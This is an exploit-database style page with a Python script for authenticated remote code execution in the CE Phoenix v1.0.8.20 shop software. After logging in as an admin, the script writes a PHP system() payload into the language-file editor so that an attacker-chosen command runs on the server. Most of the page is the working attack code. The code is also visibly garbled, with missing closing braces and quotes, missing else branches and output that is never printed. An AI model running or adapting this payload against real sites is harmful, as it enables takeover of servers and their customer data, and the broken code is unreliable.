CE Phoenix v1.0.8.20 Exploit, Remote Code Execution

## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)


import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'

def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                    colors.CRED, colors.CBEIGE]

    banner = color_random[0] + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    for char in banner:
        print(char, end='')

def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None

def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")

    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

    if not login_response.ok:
        print("[-] Login failed.")

    print("[+] Login successful.")

    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
        print("[-] Exploit failed.")

    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")

def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)

if __name__ == "__main__":

    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")

    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]

    main(base_url, username, password, command)

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD